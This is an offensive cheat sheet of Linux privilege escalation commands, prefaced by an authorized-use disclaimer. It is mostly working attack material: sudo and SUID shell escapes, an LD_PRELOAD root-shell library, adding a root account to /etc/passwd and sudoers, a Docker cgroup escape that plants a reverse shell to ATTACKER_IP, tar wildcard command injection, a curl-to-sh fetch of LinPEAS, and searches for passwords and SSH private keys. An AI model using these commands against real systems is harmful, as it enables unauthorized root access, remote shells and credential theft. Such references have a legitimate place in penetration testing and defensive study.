← All cheat sheets

LinuxPrivilegeEsc

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

ENUMERATION#

# System info
uname -a
cat /etc/*release*
cat /proc/version
hostname

# Current user
id
whoami
groups
cat /etc/passwd
cat /etc/shadow    # if readable
cat /etc/group

# Network info
ifconfig -a
ip addr
netstat -antup
ss -tulpn
route -n
cat /etc/hosts
cat /etc/resolv.conf
arp -a

# Running processes
ps aux
ps -ef
top -n 1

# Installed packages
dpkg -l           # Debian/Ubuntu
rpm -qa           # RHEL/CentOS

SUID/SGID BINARIES#

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

# Both SUID and SGID
find / -perm -6000 -type f 2>/dev/null

# Common exploitable SUID binaries (check GTFOBins)
/usr/bin/find
/usr/bin/vim
/usr/bin/awk
/usr/bin/nmap
/usr/bin/less
/usr/bin/more
/usr/bin/nano
/usr/bin/cp
/usr/bin/mv
/usr/bin/man
/usr/bin/env
/usr/bin/python
/usr/bin/perl
/usr/bin/ruby

SUDO EXPLOITATION#

# Check sudo permissions
sudo -l

# Common sudo exploits
sudo -u#-1 /bin/bash      # CVE-2019-14287
sudo vim -c ':!/bin/bash'
sudo find /etc -exec /bin/bash \;
sudo awk 'BEGIN {system("/bin/bash")}'
sudo nmap --interactive   # Older versions
sudo python -c 'import os; os.system("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
sudo less /etc/passwd     # Then: !/bin/bash
sudo man man              # Then: !/bin/bash
sudo env /bin/bash
sudo ed                   # Then: !/bin/bash
sudo git -p help config   # Then: !/bin/bash
sudo ftp                  # Then: !/bin/bash

# LD_PRELOAD exploitation (if env_keep+=LD_PRELOAD)
# Create malicious library:
#include <stdio.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
# Compile: gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# Run: sudo LD_PRELOAD=/tmp/shell.so <allowed_command>

CAPABILITIES#

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Exploit cap_setuid
/usr/bin/python3 = cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Exploit cap_dac_override (read any file)
# Exploit cap_chown (change file ownership)

CRON JOBS#

# View cron jobs
cat /etc/crontab
ls -la /etc/cron.*
cat /var/spool/cron/crontabs/*
crontab -l
systemctl list-timers

# Check for writable scripts in cron
ls -la /etc/cron.d/
ls -la /var/spool/cron/

# PATH exploitation in cron
# If cron runs script without full path:
# Create malicious script in /tmp or other PATH directory

WRITABLE FILES/DIRECTORIES#

# World-writable files
find / -writable -type f 2>/dev/null
find / -perm -2 -type f 2>/dev/null

# World-writable directories
find / -writable -type d 2>/dev/null
find / -perm -2 -type d 2>/dev/null

# Writable /etc/passwd
echo 'newroot:$1$salt$qJH7.N4xYta3aEG/dfqo/0:0:0:root:/root:/bin/bash' >> /etc/passwd
# Password: password (or generate with openssl passwd -1 -salt salt password)

# Writable /etc/shadow
# Replace root hash

# Writable sudoers
echo "username ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

PATH VARIABLE MANIPULATION#

# If SUID binary calls command without full path
export PATH=/tmp:$PATH
echo '/bin/bash' > /tmp/commandname
chmod +x /tmp/commandname

KERNEL EXPLOITS#

# Check kernel version
uname -r

# Common kernel exploits
# DirtyCow (CVE-2016-5195) - Linux < 4.8.3
# DirtyPipe (CVE-2022-0847) - Linux 5.8+
# PwnKit (CVE-2021-4034) - Polkit pkexec

# Search for exploits
searchsploit linux kernel <version>

NFS#

# Check for no_root_squash
cat /etc/exports
showmount -e <target>

# If no_root_squash, mount and create SUID binary
mkdir /tmp/nfs
mount -t nfs <target>:/share /tmp/nfs
cp /bin/bash /tmp/nfs/
chmod +s /tmp/nfs/bash
# On target: /share/bash -p

DOCKER ESCAPE#

# Check if in docker
cat /.dockerenv
ls -la /.dockerenv

# Check docker socket
ls -la /var/run/docker.sock

# If docker socket is accessible
docker run -v /:/mnt --rm -it alpine chroot /mnt bash

# Privileged container escape
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /cmd
chmod +x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

MYSQL#

# MySQL running as root
mysql -u root -p
# At mysql prompt:
\! /bin/bash

# UDF exploitation
# If plugin directory is writable

WILDCARD INJECTION#

# tar with wildcard
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
# Wait for tar * to execute

# chown with wildcard
echo "" > "--reference=/etc/passwd"

ENUMERATION SCRIPTS#

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Exploit Suggester
./linux-exploit-suggester.sh

# pspy - monitor processes
./pspy64

PASSWORD HUNTING#

# Search for passwords
grep -r "password" /home /var/www /opt 2>/dev/null
grep -r "pass" /etc 2>/dev/null
find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.conf" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.config" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.xml" -exec grep -l "password" {} \; 2>/dev/null
cat ~/.bash_history
cat /home/*/.bash_history

# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
cat ~/.ssh/id_rsa